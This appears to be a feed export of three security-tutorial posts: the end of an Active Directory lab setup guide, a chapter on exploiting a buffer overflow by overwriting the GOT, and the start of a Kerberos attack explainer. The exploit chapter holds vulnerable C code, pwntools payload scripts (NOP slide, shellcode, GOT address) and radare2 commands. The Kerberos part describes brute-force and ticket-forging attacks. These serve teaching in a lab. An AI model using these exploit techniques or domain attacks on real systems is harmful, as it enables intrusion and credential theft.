Computer sample attached correctly

## Elevating a Domain User to Administrator: The How-To Guide

Elevating a user to an administrator level on a specific machine is a crucial step for many of the attacks we&apos;ll explore. Let&apos;s dive into how to achieve this. Start by logging into your Windows machine, either with a user previously created from the domain or directly through the domain administrator user, especially if you prefer not to run tools as an administrator.

![](/content/images/2023/09/Pasted-image-20230901085101.png)

Access via user beruinsect

Your first stop is the &quot;Computer Management&quot; application. It&apos;s your control room for managing users and groups. Inside, navigate to the &quot;Groups&quot; unit and locate the &apos;Administrators&apos; group. Clicking on this group will reveal an &quot;Add&quot; button – this is your gateway to elevating a user&apos;s status.

![](/content/images/2023/09/Pasted-image-20230902122115.png)

Running Computer Management as administrator

  
Here&apos;s where the magic happens. Search for the user you wish to elevate – in our example, let&apos;s use &quot;beru.&quot; A handy feature here is the &quot;Check Names&quot; option, which helps in auto-completing the user name, streamlining the process. Once you&apos;ve selected your user and confirmed the name, they are on their way to joining the ranks of administrators.

![](/content/images/2023/09/Pasted-image-20230902122439.png)

Process for adding a domain user as machine administrator

If all steps are correctly followed, you should see the domain user now listed as an administrator. It&apos;s a significant milestone in setting up your domain for various attack simulations and learning experiences.

![](/content/images/2023/09/Pasted-image-20230902122253.png)

Verification that the user was added successfully

## Activating SMB for Enhanced Network Functionality

Enabling SMB is a straightforward process, pivotal for practicing reconnaissance techniques and attacks such as NTLM relay. The journey begins in the file browser, where a click on the &quot;Network&quot; tab unveils the next steps.

![](/content/images/2023/09/Pasted-image-20230902122535.png)

Network access from the file explorer

Initially, an error message greets us, indicating that SMB is not currently active. It&apos;s a minor roadblock, quickly cleared by removing the error notice. What follows is a prompt displayed as a yellow bar, a signal to initiate network discovery and file sharing.

![](/content/images/2023/09/Pasted-image-20230902122559.png)

SMB disabled error

This prompt is our cue to action. By selecting &quot;Turn on network discovery and file sharing&quot;, we ignite the process of activating SMB. This step is more than a mere click; it&apos;s the activation of a crucial service, laying the groundwork for a range of network-based exercises and explorations.

![](/content/images/2023/09/Pasted-image-20230902122615.png)

We start the SMB service on the machine

# Wrapping Up: Building a Robust Active Directory Lab in Proxmox

In this chapter, we&apos;ve journeyed through the meticulous process of configuring a functional Active Directory environment within Proxmox. Our path has led us from installing essential drivers for Windows machines to setting up a robust Active Directory domain, rich with opportunities for practicing diverse attacks.

We&apos;ve navigated through various configurations, from aligning DNS settings for domain connectivity to integrating machines into our domain. Each step, crafted with precision, has contributed to a structured and organized domain landscape, ideal for delving into advanced attack strategies.

Key to our setup has been the creation and management of user accounts, including domain administrators and service accounts. These accounts, carefully crafted and managed, provide a realistic backdrop for simulating attacks like NTLM Relay, Password Spraying, Kerberoasting, and more.

Moreover, we&apos;ve enabled SMB on our machines, a crucial step that opens doors to a plethora of reconnaissance techniques and network-based attacks. This activation not only enhances our lab&apos;s functionality but also aligns it closely with real-world network environments.

In essence, this chapter serves as a cornerstone in building a comprehensive hacking lab, one that not only facilitates learning and experimentation but also mirrors the complexities and nuances of actual Active Directory environments. It&apos;s a foundation upon which we can continue to build, explore, and refine our skills in the dynamic world of cybersecurity.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What do I have to do in proxmox on windows machines if I want to be able to access the internet ?&lt;/summary&gt;

I have to install the necessary drivers through the &quot;Device Manager&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Which package is essential for me to install in order to create an active directory domain?&lt;/summary&gt;

Under &quot;Add Roles and Features&quot; in the &quot;Server Manager&quot; I have to install the package &quot;Active Directory Domain Services&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Which package do I have to install to be able to attack LDAPs?&lt;/summary&gt;

I have to install the certificate authority in &quot;Add Roles and Features&quot; through the &quot;Server Manager&quot;.I have to install the certificate authority in &quot;Add Roles and Features&quot; through the &quot;Server Manager&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Could you tell me some attacks that I could practice focused on users ? And focused on service accounts (SPNs)?&lt;/summary&gt;

It allows me to practice user enumeration, brute force or password spraying attacks. It also allows me to simulate attacks such as ntlm relay or network poisoning. On the other hand, by means of SPNs I could perform the Kerberoast attack.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do I have to add in the network configuration of the windows machines to make them able to ping the domain ?&lt;/summary&gt;

I have to put as dns of the machine to the domain controller.I have to put as dns of the machine to the domain controller.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What do I have to do to get crackmapexec to return a &quot;Pwn&quot; with the credentials of a specific user?&lt;/summary&gt;

I have to make that user a local administrator of the machine (or domain). To promote it to administrator, I have to go to &quot;Computer Management&quot; and add the user to the administrators group.
&lt;/details&gt;

# References

Most of the active directory configuration has been based on the following fantastic video from CyberMentor :)</content:encoded><author>Ruben Santos</author></item><item><title>Advanced Exploits: Overcoming Restrictions with GOT and PLT</title><link>https://www.kayssel.com/post/exploitation-of-code-from-dynamic-function-resolution</link><guid isPermaLink="true">https://www.kayssel.com/post/exploitation-of-code-from-dynamic-function-resolution</guid><description>Expanding Exploit Techniques: This chapter delves into complex exploit scenarios, utilizing GOT and PLT knowledge to bypass advanced code restrictions, enhancing our toolkit with dynamic function resolution strategies.</description><pubDate>Sat, 22 Jul 2023 16:53:36 GMT</pubDate><content:encoded>### Introduction: Navigating Complex Exploits with GOT and PLT

In the world of exploit development, we often encounter scenarios that don&apos;t fit the straightforward mold. The previous chapters provided us with insights and techniques for simpler exploits. However, the real challenge begins when we face vulnerable codes that defy conventional exploitation methods. This chapter is dedicated to addressing such complexities.

**Expanding Our Exploitation Horizons:**

1.  **Beyond Basic Exploits**: We&apos;re moving away from the simplicity of earlier exploits to tackle more intricate and less straightforward vulnerabilities.
2.  **Utilizing Dynamic Function Resolution**: Our focus shifts to leveraging the knowledge of dynamic function resolution, particularly the intricacies of the Global Offset Table (GOT) and Procedure Linkage Table (PLT). These concepts, initially introduced in [chapter 4](https://www.kayssel.com/post/binary-4/), will now become our primary tools in overcoming advanced restrictions.
3.  **Adapting to Code Constraints**: We&apos;ll explore strategies to navigate around coding structures that prevent traditional exploit methods. This includes codes ending with functions like &apos;exit()&apos; or trapped in infinite loops, which pose unique challenges in exploitation.
4.  **Expanding the Toolkit**: As we dive deeper into the nuances of GOT and PLT, the importance of a versatile toolkit becomes evident. We&apos;ll continue to harness tools like radare2 and pwntools, not just as aids but as essential elements in our exploit development process.

**Embarking on a New Chapter:**

As we embark on this chapter, we&apos;re not just learning a new technique; we&apos;re adapting to the evolving landscape of exploit development. This journey will enhance our ability to think critically, adapt our strategies, and effectively utilize the tools at our disposal. Let&apos;s dive in and add another powerful technique to our growing repertoire of exploit development.

# **Exploiting GOT for Program Flow Hijacking**

In the intricate world of binary exploitation, we often encounter seemingly impervious functions within binaries, such as those terminating with &quot;exit()&quot; or trapped in infinite loops. These situations present a unique challenge: they hinder our ability to overwrite the return address and hijack the program&apos;s execution flow. However, there&apos;s a silver lining in this complex scenario, and it lies in the strategic use of the Global Offset Table (GOT).

## **Understanding GOT&apos;s Role in Exploits:**

1.  **GOT as an Arbitrary Writing Point:** Introduced in [Chapter 4](https://www.kayssel.com/post/binary-4/), the GOT plays a crucial role in dynamic function linking. Its structure offers us a potential target for exploitation. If we can exploit a vulnerability that permits overwriting memory data, we can manipulate the GOT entries of dynamically linked functions. This manipulation paves the way for redirecting the execution flow to our desired destination – our crafted shellcode.
2.  **Hijacking with Precision:** The exploitation of GOT revolves around altering specific entries. By rewriting these entries, we can ensure that the next time the program calls a dynamically linked function, it doesn’t jump to the standard library code. Instead, it leaps straight into the jaws of our shellcode, effectively hijacking the program’s behavior.
3.  **Bypassing Conventional Barriers:** This approach circumvents the limitations posed by secure functions and infinite loops. By focusing on the GOT, we target a universal aspect of dynamically linked binaries, opening up new avenues for exploit development.

## **Crafting the Exploit:**

The key to a successful GOT exploit lies in a deep understanding of the binary&apos;s structure and the behavior of its dynamically linked functions. It requires meticulous planning and precision in execution. The rewards, however, are substantial – the ability to control program flow even in the most resilient binaries.

This chapter will guide you through the nuances of exploiting the GOT, demonstrating techniques to turn this table to your advantage. Whether you&apos;re bypassing security measures or overcoming structural challenges, mastering GOT manipulation is a powerful addition to your exploit toolkit.

# **Illustrating GOT Exploitation with a Vulnerable Code Example**

To provide a practical understanding of how GOT can be exploited, let&apos;s delve into an example of vulnerable code, adapted from the &quot;[Guia de Exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/).&quot; This code, while seemingly complex at first glance, offers a perfect scenario to demonstrate GOT manipulation.

```c
    #include &lt;stdlib.h&gt;
    #include &lt;string.h&gt;
    int main(int argv,char **argc) {
            char *pbuf=malloc(4);
            char buf[256];
    
            strcpy(buf,argc[1]);
            for (;*pbuf++=*(argc[2]++););
            exit(1);
    }

```

## **Breaking Down the Vulnerable Code:**

1.  **Memory Allocation and Pointers:**
    -   The code begins by allocating a 4-byte memory space using the `malloc` function. This allocated space is referenced by the pointer `pbuf`.
    -   Essentially, `pbuf` acts as a marker, pointing to a specific location in memory where we can store or manipulate data.
2.  **Buffer Creation and Data Copy:**
    -   A buffer, `buf`, is declared with a capacity of 256 characters. This buffer is designed to store data passed as an argument (`argc[1]`).
    -   The `strcpy` function copies the content of `argc[1]` into `buf`, replicating the input data within the program&apos;s memory.
3.  **Iterative Data Transfer:**
    -   The subsequent `for` loop iterates over the characters in `argc[2]`, transferring each character to the memory space pointed to by `pbuf`.
    -   This loop continues until it reaches the end of the string in `argc[2]`, effectively copying its content into the space allocated by `malloc`.
4.  **Program Termination:**
    -   The final act of the program is to invoke the `exit` function, terminating the execution.

## **Identifying the Vulnerability**

At the core of this code lies a critical vulnerability: the lack of bounds checking. The `strcpy` function and the `for` loop do not verify the length of the input data, leading to potential buffer overflows. This oversight opens a window for attackers to manipulate memory, particularly the GOT, to divert the program flow.

## **Exploitation Strategy**

The exploit strategy involves carefully crafting input that overflows the `buf` buffer and manipulates the memory space pointed to by `pbuf`. By doing so, we aim to overwrite specific GOT entries, redirecting function calls to our shellcode. This requires precise knowledge of the memory layout and the functions used by the binary.

In the following sections, we&apos;ll walk through the steps of constructing and deploying an exploit that leverages this vulnerability, turning a seemingly benign program into a gateway for GOT manipulation and control flow hijacking.

# **Exploit Strategy: Redirecting Control Flow via GOT Manipulation**

In this scenario, we encounter a unique challenge: the inability to directly modify the return address due to the program&apos;s use of the `exit` function. To navigate this obstacle, we&apos;ll employ a strategy centered around manipulating the Global Offset Table (GOT). This approach diverges from the methods used in previous chapters, focusing instead on altering GOT entries to redirect the program&apos;s execution flow.

## **The Core of the Attack Strategy**

1.  **Targeting the GOT:**
    -   Our primary goal is to modify an entry within the GOT. By altering this entry, we can redirect the dynamic linking process, causing the program to execute our shellcode instead of the intended library code.
    -   The chosen target for modification will be the GOT entry for the `exit` function.
2.  **Shellcode Placement:**
    -   We&apos;ll store our shellcode within the `buf` variable. This placement is strategic, leveraging the buffer overflow vulnerability to store our malicious code.
3.  **Exploiting Buffer Overflow:**
    -   The program&apos;s lack of bounds checking when copying data to `buf` will be exploited to trigger a buffer overflow.
    -   Through this overflow, we aim to modify the `pbuf` pointer, redirecting it to the GOT entry of the `exit` function.
4.  **Visualizing the GOT:**
    -   It&apos;s helpful to conceptualize the GOT as a table containing entries for functions requiring dynamic linking. Each entry points to the actual code to be executed.
    -   In our exploit, we&apos;ll manipulate the `pbuf` pointer to point to the `exit` function&apos;s GOT entry, preparing to overwrite it with the address of our shellcode.
5.  **Modifying the GOT Entry:**
    -   The program&apos;s loop that modifies the content of the memory space pointed to by `pbuf` plays a crucial role. This loop will be used to inject the stack address of the `buf` variable (containing our shellcode) into the GOT.
    -   By doing so, we effectively change the program&apos;s execution flow to our shellcode when the `exit` function is called.

## **Gathering Required Addresses**

To successfully execute this exploit, we need to obtain specific memory addresses:

-   The GOT entry for the exit function: This crucial address can be directly retrieved using radare2. By executing commands like `pd @ got.plt`, we can swiftly pinpoint the GOT entry corresponding to the exit function.
-   The stack address of the buf variable: Unlike the exit function&apos;s GOT entry, the stack address of the buf variable will be determined dynamically as we develop and refine the exploit. Observing how our payload interacts with the program&apos;s memory during execution will guide us in identifying this critical address.

![](/content/images/2023/07/image.png)

GOT sample of the vulnerable program

## **Summary of the Attack**

The following diagram provides a visual summary of our exploit strategy, highlighting the critical points of GOT manipulation and buffer overflow to achieve control flow redirection. This methodical approach sets the stage for a successful exploitation of the vulnerability, turning a constrained environment into an opportunity for shellcode execution.

![](/content/images/2023/07/image-21.png)

Attack diagram

# **Breaking Down the Code in Radare2: A Step-by-Step Analysis**

We dive into the heart of our vulnerable program using radare2, an essential tool in our hacking toolkit. Using straightforward commands, we unravel the mystery behind the assembly code, translating it effortlessly back to our source code discussed at the beginning of the chapter.

```bash
r2 ./vulnerable
aaa
pdf @dbg.main

```

![](/content/images/2023/07/image-2.png)

Binary assembly code

The initial parts of the code, involving dynamic memory allocation to the `pbuf` pointer and copying user input into the `buf` variable, are fairly straightforward.

![](/content/images/2023/07/image-17.png)

Memory space creation code

![](/content/images/2023/07/image-19.png)

Copy from argv\[|\] to buf

It&apos;s the third segment, representing the &quot;for&quot; loop, where things get spicy!

![](/content/images/2023/07/image-8.png)

Copy of argv\[2\] to the memory space pointed to by pbuf.

  
  
The first highlighted instruction is crucial: it moves the memory address pointing to `argv[2]` into `edx`. Think of it as setting the stage for the critical third point in our journey. By using the `pxr` command in radare2, we can peek into the destination of this memory address, much like a detective piecing together clues.

![](/content/images/2023/07/image-10.png)

Memory address of pbuf and memory space it points to 

  
Moving to the second highlight, we see the loading of the `pbuf` variable value into `eax`. This is where our exploit takes shape: `eax` needs to hold the memory address of the GOT entry we want to tweak. Imagine aiming your hacking skills precisely at the bullseye of the GOT table, as shown in the earlier diagram.

The final highlight in our code analysis reveals the two instructions that crucially copy the value from `argv[2]` (our key to executing the shellcode) into the location pointed to by `pbuf`. This dance of bytes and addresses continues until `al` hits zero, signaling the end of our string.

To bring this to life, consider the example in the dynamic code execution diagram. In it, `eax` aligns with the memory address of the `exit` entry in the GOT, while `edx` holds a byte from `argv[2]`. It&apos;s like watching the final pieces of our hacking puzzle snap into place.

![](/content/images/2023/07/image-11.png)

Dynamic analysis of the for loop

# Crafting the GOT Exploit: Two-Pronged Approach Using Radare2

In our exploit journey, we&apos;re set to develop two separate payloads, each tailored for specific arguments (argv\[1\] and argv\[2\]). Our toolkit? Primarily radare2, stepping away from pwndbg for this round.

## Exploit argv\[1\]: Buffer Overflow and NOPs Strategy

The first exploit plays a critical role in our overall strategy. It leverages a buffer overflow to manipulate the `pbuf` pointer, directing it to our desired GOT entry. But there&apos;s more - it&apos;s not just about redirection. We also need to ensure the execution of our shellcode, and for that, we introduce NOPs (No Operation instructions).

NOPs are our safety net - they don&apos;t alter the code but create a slide, a runway for our shellcode to execute smoothly. Let&apos;s say the exact start of our `buf` is a mystery; NOPs extend our landing zone, giving us a better chance at a successful exploit.

![](/content/images/2023/07/image-12.png)

Stack diagram filled with NOPs and shellcode

So, imagine a stack peppered with NOPs, leading to our shellcode. It&apos;s a cushion, a preparation for the final act - executing the &quot;Hello&quot; message via our shellcode. For this, we employ pwntools&apos; &quot;shellcraft&quot; utility, a familiar friend from our previous exploits.

```python
#!/usr/bin/env python3

from pwn import *

context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
context.terminal = [&quot;kitty&quot;, &quot;-e&quot;, &quot;sh&quot;, &quot;-c&quot;]
shellcode = shellcraft.echo(&quot;Hello\n&quot;, constants.STDOUT_FILENO)

payload = b&apos;\x90&apos; * 50  # The NOP slide
payload += asm(shellcode)  # Our crafted message
payload += cyclic(256 - 50 - len(asm(shellcode)))  # Precise padding
payload += p32(0x0804c018)  # Target GOT entry

sys.stdout.buffer.write(payload)
```

### Validating Our Approach with Radare2

To test the mettle of our exploit, we turn to radare2. It&apos;s our window into the inner workings of the vulnerable program, allowing us to validate if our strategic manipulations bear fruit.

```bash
r2 ./vulnerable
ood `!python3 exploit.py` AAAA

```

Executing our exploit, we observe the desired shift in execution flow. The program, now hijacked, obediently follows our redirect to &quot;0x41414141&quot; (AAAA). It&apos;s a moment of triumph, a testament to our exploit&apos;s effectiveness.

![](/content/images/2023/07/image-13.png)

Sample of successful execution flow change

## Crafting the Second Wave: Exploit for argv\[2\]

Our journey through the treacherous waters of exploitation now brings us to crafting the second argument – the key to unlocking the destination of our shellcode.

### Navigating to the Shellcode&apos;s Hideout

Our primary task with this argument is straightforward yet crucial. We need to ensure that the &apos;pbuf&apos; pointer is set sail directly to the memory address housing our shellcode – nestled within the &apos;buf&apos; variable.

### **Setting the Course with Precision**

Our exploit&apos;s success hinges on pinpoint accuracy. We need the exact memory address where &apos;buf&apos; begins, as this is where our shellcode awaits its cue. To pinpoint this location, we drop an anchor right after the strcpy function.

![](/content/images/2023/07/image-14.png)

Breakpoint after copying the payload to the stack. 

### **Charting the Stack&apos;s Depths**

With the strategic placement of NOPs at the outset of our exploit, identifying the start of our shellcode becomes easier. These NOPs create a visible trail on the stack, guiding us to the exact location of &apos;buf&apos;. The illustration below reveals how our payload appears on the stack, with the NOPs making our target location unmistakable.

![](/content/images/2023/07/image-16.png)

Memory address of the variable buf

### **Preparing the Second Payload**

Armed with the knowledge of where our shellcode begins, we can now prepare the second payload. This payload&apos;s mission is singular – to ensure &apos;pbuf&apos; points to our shellcode&apos;s starting line. The payload would be a simple yet precise command, leading &apos;pbuf&apos; to the memory address of &apos;buf&apos;.

```bash
#!/usr/bin/env python3
from pwn import *
context.update(arch=&quot;i386&quot;, os=&quot;linux&quot;)
payload = b&apos; &apos;
payload += p32(0xffffc774)
sys.stdout.buffer.write(payload)

```

Upon deploying this payload, we can validate our success in radare with the following command: `ood &apos;!python3 exploit.py&apos; &apos;!python3 address.py&apos;`. If our calculations are correct, we should witness the successful execution of our code, a testament to our meticulous planning and execution.

![](/content/images/2023/07/image-15.png)

Execution of the program in radare2

# Conclusion: Mastering GOT Exploitation

In this chapter, we&apos;ve delved deep into the intricacies of exploiting the Global Offset Table (GOT) to navigate around the constraints of a program that uses functions like &apos;exit()&apos; or is locked in an infinite loop. Our journey has shown that even when direct control over the return address is not feasible, there&apos;s still a path to successful exploitation.

**Key Takeaways:**

1.  **Strategic Use of GOT**: We&apos;ve learned that the GOT, a crucial part of dynamic function linking, can be a valuable target for exploitation. By altering a GOT entry, we redirect the dynamic linking process to execute our shellcode.
2.  **Buffer Overflow and Shellcode Execution**: Our exploits demonstrated the effective use of buffer overflow to manipulate the &apos;pbuf&apos; pointer. We also saw the importance of precise shellcode placement within the &apos;buf&apos; variable and the role of NOPs in ensuring successful execution.
3.  **Two-Part Exploit Approach**: The development of two separate payloads for argv\[1\] and argv\[2\] highlighted the need for a multifaceted strategy in complex exploits. The first exploit leveraged a buffer overflow, while the second precisely directed the &apos;pbuf&apos; pointer to our shellcode.
4.  **Tool Utilization**: This chapter underscored the importance of tools like radare2 and pwntools in developing and testing exploits. Radare2 was pivotal in examining the stack and determining the exact location for our shellcode, while pwntools facilitated the creation of effective payloads.
5.  **Adaptability in Exploit Development**: Our journey emphasized the need for adaptability in the face of challenging exploit scenarios. When traditional methods were not applicable, we adapted our approach to use the GOT, demonstrating that there are multiple pathways to achieve exploitation goals.

**Looking Ahead:**

As we continue to explore the realm of exploitation, the lessons learned in this chapter will serve as a foundation for tackling even more complex scenarios. The ability to think creatively, adapt strategies, and utilize various tools will be invaluable in overcoming the challenges that lie ahead in the art of exploitation.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What can we use to get our exploit executed in case the program is in an infinite loop or terminates using the &quot;exit()&quot; function?&lt;/summary&gt;

We could use the GOT to modify dynamic linking so that when the relocation process of a function is performed, the code pointed to is the one introduced by our exploit.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can we find the .got section inside the binary with radare2?&lt;/summary&gt;

We can use the &quot;iS&quot; command to display the different sections of the binary. Then using the &quot;pd&quot; command we can display the assembler code of the memory address corresponding to the .got.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What does the &quot;NOP&quot; instruction do and how can it be useful in exploit development?&lt;/summary&gt;

The &quot;NOP&quot; instruction, as its name indicates &quot;No Operation&quot;, does nothing. However it is really useful to put in our exploit when we do not know for sure where our exploit is going to start.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can I do to make a python script show its output in binary so that we can use it to test our explot together with radare2 ?&lt;/summary&gt;

I have to make the output displayed, by our script, this normally being the payload, to be something like the following:I have to make the output displayed, by our script, this normally being the payload, to be something like the following:

```python
sys.stdout.buffer.write(payload)

```

Then, using the following radare2 command, we can see how the code responds to our exploit:

```bash
ood `!python3 exploit.py` `!python3 address.py`

```
&lt;/details&gt;

# References

[Guía de auto-estudio para la escritura de exploits · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/)</content:encoded><author>Ruben Santos</author></item><item><title>Decoding Kerberos: Understanding the Authentication Process and Main Attacks</title><link>https://www.kayssel.com/post/kerberos</link><guid isPermaLink="true">https://www.kayssel.com/post/kerberos</guid><description>Explore Kerberos&apos; mechanics and key attacks in a lab setting. Learn authentication steps, and master techniques like Kerberoast and Golden Ticket for practical cybersecurity skills</description><pubDate>Sat, 24 Jun 2023 14:32:08 GMT</pubDate><content:encoded># **Unraveling Kerberos: A Deep Dive into Authentication and its Vulnerabilities**

Welcome back to our ongoing series on mastering the nuances of cybersecurity! In this chapter, we pivot our focus to the Kerberos authentication protocol, dissecting its complexities and exploring the vulnerabilities inherent in its design. Kerberos, a cornerstone of modern authentication frameworks, plays a pivotal role in user authentication and authorization within networked environments.

Our journey will take us through the labyrinth of the Kerberos process, from ticket requests to the intricacies of ticket-granting services. As we traverse this terrain, we&apos;ll demystify each component of the protocol, shedding light on both its strengths and potential weaknesses.

In addition to understanding the theoretical aspects of Kerberos, we&apos;ll dive into practical applications. We&apos;ll examine how to replicate some of the most notorious Kerberos-based attacks in a lab setting, providing a hands-on perspective on how these vulnerabilities can be exploited. This approach not only aids in better understanding the protocol but also equips us with the knowledge to anticipate and mitigate real-world threats.

As we embark on this chapter, prepare to delve into the world of Kerberos authentication, unraveling its secrets and learning how to safeguard against its exploitation. Whether you&apos;re a seasoned security professional or an enthusiastic learner, this chapter promises to be a valuable addition to your cybersecurity repertoire. Let&apos;s get started on this fascinating journey!

# Understanding Kerberos Authentication: The Ticket-Based Journey

## Summarized Process

Diving into the realm of network security, let&apos;s unravel the complexities of Kerberos - a pivotal protocol in user authentication and authorization. Imagine Kerberos as a digital gatekeeper, managing access in a domain through a system of tickets. Here&apos;s the deal: when a user seeks entry into the domain kingdom, they knock at the door of the Key Distribution Center (KDC), essentially the domain controller. If the KDC approves, it hands over a golden key, the Ticket Granted Ticket (TGT). This TGT is like a passport, granting the user the privilege to request access to various domain services.

Now, whenever the user desires to engage with a specific service within the domain, they present their TGT to the KDC. In response, the KDC issues a new key, the Ticket Granted Service (TGS). The user then takes this TGS to the service&apos;s doorstep. The service, upon verifying the authenticity and authorization level of the TGS, rolls out the red carpet, allowing access.

![img](/content/images/2023/06/2023-06-06_09-02-39_screenshot.png)

Kerberos&apos; authentication process diagram

This whole ticket-exchanging ceremony might seem intricate, but it&apos;s a dance of security and efficiency. Don&apos;t stress if it seems a bit tangled at first glance - we&apos;ll unravel each step, ensuring clarity in this digital ballet of authentication.

## Delving into Kerberos: The First Step to Domain Authentication

![img](/content/images/2023/06/2023-06-12_09-27-47_screenshot.png)

Diagram of step 1

Let&apos;s break down the Kerberos authentication process, starting from square one. Imagine you&apos;re at the gates of the digital domain, ready to prove your identity. This is where the Kerberos magic begins, a process initiated by the user sending a special request called &quot;AS-REQ&quot; to the domain&apos;s Key Distribution Center (KDC).

In this request, the user includes:

1.  Their username - like calling out your name to the gatekeeper.
2.  A request for the Ticket Granted Ticket (TGT) - akin to asking for an entry pass.
3.  A timestamp, but not just any timestamp. It&apos;s encrypted with the user’s NT hash, a secret code that ensures the user&apos;s authenticity.

This initial interaction lays the groundwork for Kerberos-based authentication. It&apos;s also the stage vulnerable to specific attacks like &quot;Pass the Key&quot; or &quot;Over Pass the Hash,&quot; which we&apos;ll explore later. Think of it as the opening scene of a cybersecurity drama, where the stage is set for both secure access and potential exploits.

## Step 2: The KDC Rolls Out the Red Carpet with a TGT Ticket

![img](/content/images/2023/06/2023-06-12_09-38-16_screenshot.png)

Diagram of step 2 

Once the user&apos;s initial appeal passes the security checks, the server, playing the role of a grand host, presents the coveted Ticket Granted Ticket (TGT) along with a session key. This ceremonial pass is wrapped up in a message dubbed “AS-REP,” marking the user&apos;s successful entry into the domain’s digital ballroom.

Here&apos;s what the AS-REP message ceremoniously unveils:

1.  **Authenticated Username**: Like a badge of honor, confirming the user&apos;s identity.
2.  **The TGT’s Duration and a Session Key**: Encrypted with the user’s NT hash, this session key is a skeleton key of sorts for the upcoming requests to various domain services. It&apos;s a promise of future accesses.
3.  **The TGT Itself**: This ticket is not just a simple pass. It&apos;s imbued with the session key, its validity period, and the Privilege Attribute Certificate (PAC). The PAC is like a detailed résumé of the user – listing their domain groups and roles. Importantly, this ticket is sealed with the NT hash of the KRBTGT account – a special account nestled within the domain controllers. Think of KRBTGT as the master key holder, with its hash being a master key. If someone were to replicate this hash, they could potentially unlock the entire domain, creating their own TGT tickets.

In essence, Step 2 is where the server grants the user a golden ticket to access the domain&apos;s resources, ensuring that the journey ahead is authenticated and authorized.

## Step 3: Knocking on the Service&apos;s Door with a TGS Request

![](/content/images/2023/06/image-14.png)

Diagram of step 3

Now, the user, equipped with the TGT from the previous step, is ready to step up and request a specific domain service. This quest for access is encapsulated in a message known as &quot;KRB-TGS-REQ,&quot; a formal request to the Kerberos gods for a Ticket Granting Service (TGS) ticket.

Here&apos;s what the user packs into this request:

1.  **The Service Name (SPN)**: Think of it as dialing the extension of the specific department in a vast corporate building. The Service Principal Name or SPN precisely identifies the service the user wishes to access. It&apos;s like saying, &quot;I need to talk to the manager of the &apos;File Sharing&apos; department.&quot;
2.  **Username and a Time-stamped Token**: To prove their identity and intention, the user includes their username coupled with a timestamp. But it&apos;s not just any timestamp; it&apos;s encrypted with the service key handed over in the previous message. It’s akin to showing a secret handshake – a way to confirm their authenticity.
3.  **The TGT Ticket**: This is the golden ticket received earlier. Presenting this ticket is like showing a VIP pass, proving that the user has been previously authenticated and is cleared to make further requests within the domain.

In a nutshell, Step 3 is where the user, armed with their TGT, makes a specific request to access a domain service. It&apos;s like approaching a concierge with a verified pass and asking for entry into an exclusive club within the grand domain estate.

## Step 4: Receiving the Golden Pass - The TGS Ticket

![](/content/images/2023/06/2023-06-13_08-34-03_screenshot.png)

Diagram of step 4

The moment of truth arrives in Step 4 of the Kerberos process. If the TGT sent by the user passes muster with the Key Distribution Center (KDC), it responds with a prized possession: the TGS (Ticket Granting Service) ticket, encapsulated in a message known as &quot;KRB-TGS-REP.&quot; This ticket is the user&apos;s gateway to the requested service. Here&apos;s what&apos;s inside this all-important response:

1.  **Client-Only Decipherable Content**: This section of the message is a treasure trove, but only for the client&apos;s eyes. It contains the service&apos;s name, a fresh timestamp, and a unique session key for the service. This part is like a confidential memo, sealed in an envelope that only the client can open, as it&apos;s encrypted using the session key provided in Step 2.
2.  **Service-Specific TGS**: The second part of the message is the TGS itself, tailored specifically for the requested service. This section is encrypted with the NT hash of the service owner, meaning only the server hosting the service can decrypt it. Packed inside are the user&apos;s name, the service name, the service&apos;s session key, a token detailing the user&apos;s privileges in the domain, and a timestamp.

In essence, Step 4 is where the KDC validates the user&apos;s request and bestows upon them the TGS ticket - a golden pass, granting access to the requested service. It’s as if the concierge, after verifying the VIP pass, hands over a special key that unlocks the doors to the exclusive club the user wished to enter.

## Step 5 to 7: The Final Stages of Kerberos Authentication

The Kerberos journey reaches its climax in these final steps, where the client&apos;s request meets the service&apos;s scrutiny, and mutual verification takes place.

### Step 5: Delivering the TGS to the Service Server

**Ticket Presentation (KRB-AP-REQ)**: In this crucial phase, the client sends the TGS ticket to the desired service. This is done through a message known as the KRB-AP-REQ. It&apos;s akin to presenting an exclusive pass at a high-security event. The service, acting as a vigilant bouncer, examines the ticket to validate its authenticity, ensuring it&apos;s signed with the service&apos;s unique key.

### Step 6: Optional Service Ticket Verification

**Guarding Against Silver Ticket Attacks**: This step, while optional, acts as an additional layer of security. The service can use it to verify the integrity of the KRBTGT account&apos;s hash. This check is a safeguard against potential Silver Ticket attacks, where attackers forge tickets to gain unauthorized access to services.

### Step 7: Confirming the Server&apos;s Identity

**Server&apos;s Assurance (KRB-AP-REP)**: The final acknowledgment comes from the server, which sends back a message, the KRB-AP-REP. This message includes a timestamp and the known service key. It’s the server&apos;s way of saying, &quot;Yes, it&apos;s really me.&quot; This mutual authentication ensures both parties are confident in each other&apos;s identity, akin to a secret handshake in a spy movie.

These steps complete the intricate dance of Kerberos authentication. It&apos;s a process where trust is established through a series of coded messages, each playing a critical role in maintaining the security and integrity of the communication between a user and the services within a domain.

# Main Kerberos Attacks: Unraveling Kerberos&apos; Vulnerabilities

Kerberos, the guardian of authentication in many domains, isn&apos;t impervious to attacks. Let’s delve into the primary attacks targeting the Kerberos protocol and how they can be executed.

## Kerberos Brute-Force Attack: Cracking the Code

Kerberos, being an authentication protocol, is susceptible to brute-force attacks. These attacks aim to validate credentials within the domain. The Kerberos system provides specific error messages for various scenarios, making it possible to identify the nature of the failure. Examples include:

-   **KDC-ERR-PREAUTH-FAILED**: Indicates an incorrect password.
-   **KDC-ERR-C-PRINCIAPL-UNKOWN**: Flags an invalid username.
-   **KDC-ERR-WRONG-REALM**: Signals an invalid domain.
-   **KDC-ERR-CLIENT-REVOKED**: Denotes a disabled or blocked user.

These distinct responses facilitate not just the brute-forcing of passwords, but also the enumeration of users.

### Harnessing Kerbrute for Non-Intrusive User Enumeration

